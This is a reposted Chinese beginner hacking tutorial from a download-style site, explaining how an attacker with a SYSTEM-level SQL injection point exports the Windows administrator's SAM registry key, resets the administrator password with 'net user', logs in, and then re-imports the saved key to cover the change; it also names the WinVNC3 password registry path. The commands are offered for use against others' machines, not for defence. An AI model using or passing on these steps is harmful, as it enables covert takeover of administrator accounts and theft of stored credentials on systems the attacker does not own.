日期:2009-08-10 16:34:00 来源:本站整理
操纵注册表读hash[菜鸟入门]
本文“操纵注册表读hash[菜鸟入门]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
SA权限的注射点的时刻,我们可以利用系统自带的一些号令来读取注册表键信息.
sa默许是SYSTEM权限,可以读sam键.
regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 win2K
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg win2003
读出来后,我们便可以直接更改管理员密码举行登陆了:
net user administrator test
用administrator登陆.
用完机械后
reg import c:\test.reg
根本不用克隆.
但是要注意,一定要找到对应的sid.
HKEY_CURRENT_USER\Software\ORL\WinVNC3
HKCU\Software\ORL\WinVNC3\Password
以上是“操纵注册表读hash[菜鸟入门]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
- ·上一篇文章:迅雷提权教程
- ·下一篇文章:ARP拐骗在WINDOWS认证中的攻击技术
- ·中查找“操纵注册表读hash”更多相关内容
- ·中查找“操纵注册表读hash”更多相关内容
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论